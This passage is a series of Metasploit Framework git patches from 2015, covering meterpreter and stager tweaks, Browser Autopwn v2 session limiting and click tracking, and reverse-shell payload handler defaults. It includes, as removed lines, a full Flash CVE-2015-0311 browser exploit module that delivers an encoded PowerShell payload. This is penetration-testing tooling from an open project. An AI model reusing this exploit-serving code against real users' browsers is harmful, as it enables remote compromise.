--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -317,6 +317,11 @@ class ClientCore < Extension
     response = client.send_request(*args)
 
     mid = response.get_tlv_value(TLV_TYPE_MACHINE_ID)
+
+    # Normalise the format of the incoming machine id so that it's consistent
+    # regardless of case and leading/trailing spaces. This means that the
+    # individual meterpreters don't have to care
+    mid.downcase!.strip! if mid
     return Rex::Text.md5(mid)
   end
 
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index ba8464c4ed..b7b94c4cc3 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_options'
 
 module Metasploit4
 
-  CachedSize = 25532
+  CachedSize = 25679
 
   include Msf::Payload::Single
   include Msf::Payload::Php::ReverseTcp

From c07ff70f193caa3817f3c6aa8c690bada770d5f9 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 22 May 2015 15:11:12 +1000
Subject: [PATCH 0157/1013] Add check for UUID payloads

Thankfully those payloads already had a flag that could be reused.
---
 lib/msf/core/payload/stager.rb | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb
index aa1826809b..4b33c00898 100644
--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -156,11 +156,13 @@ module Msf::Payload::Stager
     # If the stage should be sent over the client connection that is
     # established (which is the default), then go ahead and transmit it.
     if (stage_over_connection?)
-      uuid_raw = conn.get_once(16, 1)
-
       opts = {}
-      if uuid_raw
-        opts[:uuid] = Msf::Payload::UUID.new({raw: uuid_raw})
+
+      if include_send_uuid
+        uuid_raw = conn.get_once(16, 1)
+        if uuid_raw
+          opts[:uuid] = Msf::Payload::UUID.new({raw: uuid_raw})
+        end
       end
 
       p = generate_stage(opts)

From 078438f66e076bcfaab153fe5a32c85947d80db3 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Fri, 22 May 2015 00:30:05 -0500
Subject: [PATCH 0158/1013] Update UUIDOptions -> UUID::Options

---
 lib/msf/core/payload/windows/x64/reverse_http.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb
index 9462aa3f2f..47c333f020 100644
--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -4,7 +4,7 @@ require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/windows/x64/block_api'
 require 'msf/core/payload/windows/x64/exitfunk'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Msf
 
@@ -20,7 +20,7 @@ module Payload::Windows::ReverseHttp_x64
   include Msf::Payload::Windows
   include Msf::Payload::Windows::BlockApi_x64
   include Msf::Payload::Windows::Exitfunk_x64
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   #
   # Register reverse_http specific options

From 2bb6f390c0b8065e14c26df7692317661219b61e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 22 May 2015 12:22:41 -0500
Subject: [PATCH 0159/1013] Add session limiter and fix a race bug in notes
 removal

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 91 ++++++++++++++++++-----
 modules/exploits/multi/browser/autopwn.rb |  7 +-
 2 files changed, 76 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 174a92cdfc..c31f8ea702 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -16,8 +16,11 @@ module Msf
     # @return [Array] A list of initialized BAP exploits
     attr_reader :bap_exploits
 
-    # @return [Array] A list of module job IDs
-    attr_reader :module_job_ids
+    # @return [Array] A list of exploit job IDs
+    attr_reader :exploit_job_ids
+
+    # @return [Array] A list of payload job IDs
+    attr_reader :payload_job_ids
 
 
     # The default platform-specific payloads and preferred LPORTS.
@@ -79,19 +82,44 @@ module Msf
     # @return [void]
     def rm_target_info_notes
       return unless framework.db.active
-      ::ActiveRecord::Base.connection_pool.with_connection {
-        framework.db.notes.each do |note|
-          note.destroy if note.ntype.include?(note_type_prefix)
+      retries = 0
+      begin
+        ::ActiveRecord::Base.connection_pool.with_connection {
+          framework.db.notes.each do |note|
+            note.destroy if note.ntype.include?(note_type_prefix)
+          end
+        }
+      rescue NameError => e
+        # Very rarely, framework.db.notes triggers uninitialized constant Mdm::Workspace::Mdm::Note.
+        # Not sure why, it's been really difficult to reproduce. But the uninitialized constant error
+        # is raised by the compute_type method in inheritance.rb from active_record, so we'll just
+        # rescue that and retry a couple of times.
+        if retries < 10
+          retry
+        else
+          print_error("Unable to properly cleanup notes. Try doing it manually: notes -d")
+          elog("(BAP notes cleanup) #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
         end
-      }
+        retries += 1
+      end
     end
 
 
-    # Removes background jobs (exploits and payload handlers) that belong to BAP.
+    # Removes background exploit jobs that belong to BAP.
     #
     # @return [void]
-    def rm_jobs
-      module_job_ids.each do |id|
+    def rm_exploit_jobs
+      exploit_job_ids.each do |id|
+        framework.jobs.stop_job(id) if framework.jobs[id.to_s]
+      end
+    end
+
+
+    # Removes background payload jobs that belong to BAP.
+    #
+    # @return [void]
+    def rm_payload_jobs
+      payload_job_ids.each do |id|
         framework.jobs.stop_job(id) if framework.jobs[id.to_s]
       end
     end
@@ -99,12 +127,13 @@ module Msf
 
     # Cleans up everything such as notes and jobs.
     #
-    # @see #rm_jobs The method for cleaning up jobs.
+    # @see #rm_exploit_jobs The method for cleaning up jobs.
     # @see #rm_target_info_notes The method for removing target information (found in db notes).
     # @return [void]
     def cleanup
       rm_target_info_notes
-      rm_jobs
+      rm_exploit_jobs
+      rm_payload_jobs
     end
 
 
@@ -296,13 +325,15 @@ module Msf
     end
 
 
-    # Creates payload listeners. The active job IDs will be tracked in #module_job_ids so that
+    # Creates payload listeners. The active job IDs will be tracked in #payload_job_ids so that
     # we know how to find them and then clean them up.
     #
     # @note FireFox payload is skipped because there's no handler for it.
-    # @see #module_job_ids
+    # @see #payload_job_ids
     # @return [void]
     def start_payload_listeners
+      return if datastore['MaxSessions'] == 0
+
       DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
         # Exploit failed: firefox/shell_reverse_tcp is not a compatible payload
         next if listener_info['payload'] == 'firefox/shell_reverse_tcp'
@@ -336,7 +367,7 @@ module Msf
           'Payload' => listener_info['payload'],
           'RunAsJob' => true
         )
-        @module_job_ids << multi_handler.job_id
+        @payload_job_ids << multi_handler.job_id
       end
     end
 
@@ -379,7 +410,7 @@ module Msf
           'Payload'     => m.datastore['PAYLOAD'],
           'RunAsJob'    => true
         )
-        @module_job_ids << m.job_id
+        @exploit_job_ids << m.job_id
       end
     end
 
@@ -392,8 +423,10 @@ module Msf
       self.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2
       self.datastore['DisablePayloadHandler'] = true
       super
-      @bap_exploits = []
-      @module_job_ids = []
+      @bap_exploits    = []
+      @exploit_job_ids = []
+      @payload_job_ids = []
+
       # #split might be expensive if the file is really big
       @whitelist = datastore['Whitelist'] ? datastore['Whitelist'].split : nil
 
@@ -585,6 +618,7 @@ module Msf
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     # @return [void]
     def on_request_uri(cli, request)
+      # Check if target is on our whitelist
       if @whitelist && !is_ip_targeted?(cli.peerhost)
         print_status("Client is trying to connect but not on our whitelist.")
         send_not_found(cli)
@@ -606,15 +640,36 @@ module Msf
     end
 
 
+    # Returns a number of sessions obtained by BAP's payload handlers.
+    #
+    # @return [Fixnum] A session count.
+    def session_count
+      total = 0
+
+      payload_job_ids.each do |id|
+        total += framework.jobs[id.to_s].ctx.first.session_count
+      end
+
+      total
+    end
+
+
     # Returns the HTML that serves our exploits.
     #
     # @param cli [Socket] Socket for the browser
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     # @return [String] HTML
     def build_html(cli, request)
+      exploit_list = get_exploit_urls(cli, request)
+
+      if datastore['MaxSessions'] > -1 && session_count >= datastore['MaxSessions']
+        print_status("Exploits will not be served because you've reached the max session count of #{datastore['MaxSessions']}")
+        return datastore['Content']
+      end
+
       js = %Q|
       var currentIndex = 0;
-      var exploitList = [#{get_exploit_urls(cli, request).map! {|e| "'#{e}'"} * ", "}];
+      var exploitList = [#{exploit_list.map! {|e| "'#{e}'"} * ", "}];
 
       window.onload = function() {
         var e = document.createElement("iframe");
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 26e79ddd4b..343e544415 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -35,7 +35,9 @@ class Metasploit3 < Msf::Exploit::Remote
         OptRegexp.new('Exclude', [false, 'Pattern search to exclude specific modules']),
         OptInt.new('MaxExploits', [false, 'Number of browser exploits to load', 20]),
         OptString.new('Content', [false, 'HTML Content', '']),
-        OptAddressRange.new('Whitelist', [false, "A range of IPs you're interested in attacking"])
+        OptAddressRange.new('Whitelist', [false, "A range of IPs you're interested in attacking"]),
+        OptInt.new('MaxSessions', [false, 'Number of sessions to get', -1]),
+        OptBool.new("RealList", [true, "Show which exploits will actually be served to each client", false])
       ] ,self.class)
 
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')
@@ -58,14 +60,11 @@ class Metasploit3 < Msf::Exploit::Remote
       opts << OptInt.new("PAYLOAD_#{platform.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info['lport']])
     end
 
-    opts << OptBool.new("RealList", [true, "Show which exploits will actually be served to each client", false])
-
     opts
   end
 
   def on_request_exploit(cli, request, target_info)
     serve = build_html(cli, request)
-    print_status("Serving exploits...")
     send_exploit_html(cli, serve)
   end
 

From e8a32bdd10f8457f2dc4b132b7ebc5ff1d39a487 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 22 May 2015 12:40:56 -0500
Subject: [PATCH 0160/1013] Make MaxSessions/RealList/Custom404 work better

---
 lib/msf/core/exploit/browserautopwnv2.rb | 22 ++++++++++++++++++++--
 1 file changed, 20 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index c31f8ea702..defa451fd0 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -583,7 +583,12 @@ module Msf
         table << [order, ip, m.shortname]
         order += 1
       end
-      print_status("Exploits found suitable for #{cli.peerhost} (Tag: #{tag})#{table}")
+
+      if table.rows.empty?
+        print_status("No exploits found suitable for #{cli.peerhost} (Tag: #{tag})#{table}")
+      else
+        print_status("Exploits found suitable for #{cli.peerhost} (Tag: #{tag})#{table}")
+      end
     end
 
 
@@ -654,6 +659,14 @@ module Msf
     end
 
 
+    # Returns the custom 404 URL set by the user
+    #
+    # @return [String]
+    def get_custom_404_url
+      datastore['Custom404'].to_s
+    end
+
+
     # Returns the HTML that serves our exploits.
     #
     # @param cli [Socket] Socket for the browser
@@ -664,7 +677,12 @@ module Msf
 
       if datastore['MaxSessions'] > -1 && session_count >= datastore['MaxSessions']
         print_status("Exploits will not be served because you've reached the max session count of #{datastore['MaxSessions']}")
-        return datastore['Content']
+        if datastore['Content'].blank?
+          send_not_found(cli)
+          return ''
+        else
+          return datastore['Content']
+        end
       end
 
       js = %Q|

From 905fe73d78a0c237460aa63ec3dd42b96e6c5380 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 22 May 2015 12:57:06 -0500
Subject: [PATCH 0161/1013] Track clicks

---
 lib/msf/core/exploit/browserautopwnv2.rb | 20 +++++++++++++++++++-
 1 file changed, 19 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index defa451fd0..24af9ab4c3 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -567,6 +567,22 @@ module Msf
     end
 
 
+    # Logs the actual exploit list (for the client) to our database. The data will be saved
+    # in csv format.
+    #
+    # @param [String] ip The target's IP address.
+    # @param [Rex::Ui::Text::Table] table Rex table that contains the exploit list.
+    # @return [void]
+    def log_real_list(ip, table)
+      csv_data = table.rows.empty? ? '' : table.to_csv
+      report_note(
+        :host => ip,
+        :type => 'bap.exploitlist',
+        :data => csv_data,
+        :update => :unique_data)
+    end
+
+
     # Prints a list of suitable exploits for the current list.
     #
     # @see #sort_bap_exploits Explains how the exploit list is generated at first.
@@ -584,8 +600,10 @@ module Msf
         order += 1
       end
 
+      log_real_list(cli.peerhost, table)
+
       if table.rows.empty?
-        print_status("No exploits found suitable for #{cli.peerhost} (Tag: #{tag})#{table}")
+        print_status("User #{cli.peerhost} (Tag: #{tag}) visited our malicious link, but no exploits found suitable.")
       else
         print_status("Exploits found suitable for #{cli.peerhost} (Tag: #{tag})#{table}")
       end

From 8fd468a89f5176c8f1ee0952867506582c35df0f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 22 May 2015 13:07:30 -0500
Subject: [PATCH 0162/1013] Get the dry-run feature right this time

---
 lib/msf/core/exploit/browserautopwnv2.rb | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 24af9ab4c3..20bfbed003 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -567,19 +567,17 @@ module Msf
     end
 
 
-    # Logs the actual exploit list (for the client) to our database. The data will be saved
-    # in csv format.
+    # Logs a click that includes the suitable exploit list.
     #
     # @param [String] ip The target's IP address.
-    # @param [Rex::Ui::Text::Table] table Rex table that contains the exploit list.
+    # @param [String] data (Optioal) CSV data that contains the exploit list.
     # @return [void]
-    def log_real_list(ip, table)
-      csv_data = table.rows.empty? ? '' : table.to_csv
+    def log_click(ip, data='')
       report_note(
         :host => ip,
-        :type => 'bap.exploitlist',
-        :data => csv_data,
-        :update => :unique_data)
+        :type => 'bap.clicks',
+        :data => data,
+        :update => :unique)
     end
 
 
@@ -600,11 +598,11 @@ module Msf
         order += 1
       end
 
-      log_real_list(cli.peerhost, table)
-
       if table.rows.empty?
         print_status("User #{cli.peerhost} (Tag: #{tag}) visited our malicious link, but no exploits found suitable.")
       else
+        # Update the exploit list data
+        log_click(cli.peerhost, table.to_csv)
         print_status("Exploits found suitable for #{cli.peerhost} (Tag: #{tag})#{table}")
       end
     end
@@ -648,6 +646,8 @@ module Msf
         return
       end
 
+      log_click(cli.peerhost)
+
       super
     end
 

From 9600f6a30a201d2db348cc93029a3246aec47c87 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 22 May 2015 17:14:08 -0500
Subject: [PATCH 0163/1013] rm deprecated exploit

---
 .../adobe_flash_uncompress_zlib_uaf.rb        | 110 ------------------
 1 file changed, 110 deletions(-)
 delete mode 100644 modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb

diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb
deleted file mode 100644
index 38828c2239..0000000000
--- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ /dev/null
@@ -1,110 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
-
-  include Msf::Exploit::Powershell
-  include Msf::Exploit::Remote::BrowserExploitServer
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2015, 7, 21), 'exploit/multi/browser/adobe_flash_uncompress_zlib_uaf')
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'                => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
-      'Description'         => %q{
-        This module exploits an use after free vulnerability in Adobe Flash Player. The
-        vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
-        to uncompress() a malformed byte stream. This module has been tested successfully
-        on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
-        16.0.0.235.
-      },
-      'License'             => MSF_LICENSE,
-      'Author'              =>
-        [
-          'Unknown', # Vulnerability discovery and exploit in the wild
-          'hdarwin', # Public exploit by @hdarwin89
-          'juan vazquez' # msf module
-        ],
-      'References'          =>
-        [
-          ['CVE', '2015-0311'],
-          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
-          ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
-          ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
-        ],
-      'Payload'             =>
-        {
-          'DisableNops' => true
-        },
-      'Platform'            => 'win',
-      'BrowserRequirements' =>
-        {
-          :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' },
-          :arch    => ARCH_X86
-        },
-      'Targets'             =>
-        [
-          [ 'Automatic', {} ]
-        ],
-      'Privileged'          => false,
-      'DisclosureDate'      => 'Apr 28 2014',
-      'DefaultTarget'       => 0))
-  end
-
-  def exploit
-    @swf = create_swf
-    super
-  end
-
-  def on_request_exploit(cli, request, target_info)
-    print_status("Request: #{request.uri}")
-
-    if request.uri =~ /\.swf$/
-      print_status('Sending SWF...')
-      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
-      return
-    end
-
-    print_status('Sending HTML...')
-    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
-  end
-
-  def exploit_template(cli, target_info)
-    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
-
-    html_template = %Q|<html>
-    <body>
-    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
-    <param name="movie" value="<%=swf_random%>" />
-    <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
-    <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
-    </object>
-    </body>
-    </html>
-    |
-
-    return html_template, binding()
-  end
-
-  def create_swf
-    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
-    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
-
-    swf
-  end
-
-end

From 916b7b83bee75f7315c42e6a373de105dbacac60 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 22 May 2015 20:35:43 -0500
Subject: [PATCH 0164/1013] Change how we load payload handlers

---
 lib/msf/core/exploit/browserautopwnv2.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 20bfbed003..16f1dd35ea 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -278,8 +278,14 @@ module Msf
     # @return [TrueClass] Payload is wanted.
     # @return [FalseClass] Payload is not wanted.
     def is_payload_handler_wanted?(payload_name)
+      p = framework.payloads.create(payload_name)
+      return false unless p
+
+      payload_platforms = p.platform.platforms
+
       bap_exploits.each do |m|
-        return true if m.datastore['PAYLOAD'] == payload_name
+        module_platforms = m.platform.platforms
+        return true if payload_platforms.all? { |e| payload_platforms.include? e}
       end
 
       false
@@ -468,12 +474,13 @@ module Msf
       order = 1
 
       bap_exploits.each do |m|
+        payload_used = m.datastore['PAYLOAD'] != 'firefox/shell_reverse_tcp' && m.fullname =~ /^exploit\/multi/ ? 'Multi payload handlers are used' : "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         row = []
         row << order
         row << parse_rank(m.rank)
         row << m.shortname
         row << m.datastore['URIPATH'] if datastore['VERBOSE']
-        row << "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
+        row << payload_used
         table << row
         order += 1
       end

From 60b0be8e3f59edfa5247d37ca6249a94d4517318 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 23 May 2015 01:59:29 -0500
Subject: [PATCH 0165/1013] Fix a lot of bugs

---
 lib/msf/core/exploit/browserautopwnv2.rb      | 15 +++----
 .../exploit/remote/browser_exploit_server.rb  | 20 +++++-----
 lib/msf/core/handler/reverse_tcp_double.rb    | 28 +++++++------
 .../core/handler/reverse_tcp_double_ssl.rb    |  4 +-
 .../adobe_flash_uncompress_zlib_uaf.rb        | 39 ++++++-------------
 5 files changed, 50 insertions(+), 56 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 16f1dd35ea..6dacabcb28 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -27,13 +27,14 @@ module Msf
     # The hash key is the name of the platform that matches what's on the module.
     # The loader order is specific while starting them up.
     DEFAULT_PAYLOADS = {
-      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4449 },
-      'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4448 },
+      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4442 },
+      'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4443 },
       'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp',   'lport' => 4444 },
       'linux'   => { 'payload' => 'linux/x86/meterpreter/reverse_tcp', 'lport' => 4445 },
-      'osx'     => { 'payload' => 'osx/x86/shell_reverse_tcp',         'lport' => 4446 },
-      'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',      'lport' => 4447 },
-      'generic' => { 'payload' => 'generic/shell_reverse_tcp',         'lport' => 4450 }
+      'unix'    => { 'payload' => 'cmd/unix/reverse',                  'lport' => 4446 },
+      'osx'     => { 'payload' => 'osx/x86/shell_reverse_tcp',         'lport' => 4447 },
+      'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',      'lport' => 4448 },
+      'generic' => { 'payload' => 'generic/shell_reverse_tcp',         'lport' => 4459 }
     }
 
 
@@ -285,7 +286,7 @@ module Msf
 
       bap_exploits.each do |m|
         module_platforms = m.platform.platforms
-        return true if payload_platforms.all? { |e| payload_platforms.include? e}
+        return true if payload_platforms.all? { |e| module_platforms.include? e}
       end
 
       false
@@ -474,7 +475,7 @@ module Msf
       order = 1
 
       bap_exploits.each do |m|
-        payload_used = m.datastore['PAYLOAD'] != 'firefox/shell_reverse_tcp' && m.fullname =~ /^exploit\/multi/ ? 'Multi payload handlers are used' : "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
+        payload_used = m.datastore['PAYLOAD'] != 'firefox/shell_reverse_tcp' && m.fullname =~ /^exploit\/multi/ ? 'Multiple payload handlers are used' : "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         row = []
         row << order
         row << parse_rank(m.rank)
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 104af64768..f4f173e815 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -199,6 +199,7 @@ module Msf
     def try_set_target(profile)
       match_counts        = []
       target_requirements = {}
+      profile = profile.values.first
 
       targets.each do |t|
         target_requirements = extract_requirements(t.opts)
@@ -206,7 +207,7 @@ module Msf
           match_counts << 0
         else
           match_counts << target_requirements.select { |k,v|
-            if v.class == Regexp
+            if v.is_a? Regexp
               profile[k] =~ v
             else
               profile[k] == v
@@ -337,9 +338,9 @@ module Msf
 
       report_client({
         :host      => cli.peerhost,
-        :ua_string => request.headers['User-Agent'],
-        :ua_name   => found_ua_name,
-        :ua_ver    => found_ua_ver
+        :ua_string => request.headers['User-Agent'].to_s,
+        :ua_name   => found_ua_name.to_s,
+        :ua_ver    => found_ua_ver.to_s
       })
     end
 
@@ -513,7 +514,7 @@ module Msf
           bad_reqs = get_bad_requirements(profile)
           if bad_reqs.empty?
             begin
-              method(:on_request_exploit).call(cli, request, profile)
+              method(:on_request_exploit).call(cli, request, profile.values.first)
             rescue BESException => e
               elog("BESException: #{e.message}\n#{e.backtrace * "\n"}")
               send_not_found(cli)
@@ -572,8 +573,8 @@ module Msf
     # @param browser_info [Hash] The target profile
     # @return [String] The payload
     def get_payload(cli, browser_info)
-      arch     = browser_info[:arch]
-      platform = browser_info[:os_name]
+      arch     = browser_info['arch']
+      platform = browser_info['os_name']
 
       # Fix names for consistency so our API can find the right one
       # Originally defined in lib/msf/core/constants.rb
@@ -581,9 +582,10 @@ module Msf
       platform = platform.gsub(/^Windows.*$/, 'Windows')
 
       p = regenerate_payload(cli, platform, arch)
+      target_arch = get_target.arch
 
-      unless p.arch.include?(arch)
-        err =  "The payload arch (#{p.arch * ", "}) is incompatible with the #{arch} target. "
+      unless p.arch.all? { |e| target_arch.include?(e) }
+        err =  "The payload arch (#{p.arch * ", "}) is incompatible with the target (#{target_arch * "\n"}). "
         err << "Please check your payload setting."
         raise BESException, err
       end
diff --git a/lib/msf/core/handler/reverse_tcp_double.rb b/lib/msf/core/handler/reverse_tcp_double.rb
index af0730f3c5..71d5673974 100644
--- a/lib/msf/core/handler/reverse_tcp_double.rb
+++ b/lib/msf/core/handler/reverse_tcp_double.rb
@@ -95,16 +95,22 @@ module ReverseTcpDouble
       sock_inp = nil
       sock_out = nil
 
-      print_status("Started reverse double handler")
+      unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+        print_status("Started reverse double handler")
+      end
 
       begin
         # Accept two client connection
         begin
           client_a = self.listener_sock.accept
-          print_status("Accepted the first client connection...")
+          unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+            print_status("Accepted the first client connection...")
+          end
 
           client_b = self.listener_sock.accept
-          print_status("Accepted the second client connection...")
+          unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+            print_status("Accepted the second client connection...")
+          end
         rescue
           wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
           return nil
@@ -147,35 +153,35 @@ module ReverseTcpDouble
 
       print_status("Command: #{echo.strip}")
 
-      print_status("Writing to socket A")
+      print_status("Writing to socket A") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
       sock_a.put(echo)
 
-      print_status("Writing to socket B")
+      print_status("Writing to socket B") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
       sock_b.put(echo)
 
-      print_status("Reading from sockets...")
+      print_status("Reading from sockets...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
 
       resp_a = ''
       resp_b = ''
 
       if (sock_a.has_read_data?(1))
-        print_status("Reading from socket A")
+        print_status("Reading from socket A") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
         resp_a = sock_a.get_once
         print_status("A: #{resp_a.inspect}")
       end
 
       if (sock_b.has_read_data?(1))
-        print_status("Reading from socket B")
+        print_status("Reading from socket B") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
         resp_b = sock_b.get_once
         print_status("B: #{resp_b.inspect}")
       end
 
-      print_status("Matching...")
+      print_status("Matching...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
       if (resp_b.match(etag))
-        print_status("A is input...")
+        print_status("A is input...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
         return sock_a, sock_b
       else
-        print_status("B is input...")
+        print_status("B is input...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
         return sock_b, sock_a
       end
 
diff --git a/lib/msf/core/handler/reverse_tcp_double_ssl.rb b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
index d6650f5264..6d7c89d913 100644
--- a/lib/msf/core/handler/reverse_tcp_double_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
@@ -105,7 +105,9 @@ module ReverseTcpDoubleSSL
           via = ""
         end
 
-        print_status("Started reverse double SSL handler on #{ip}:#{local_port} #{via}")
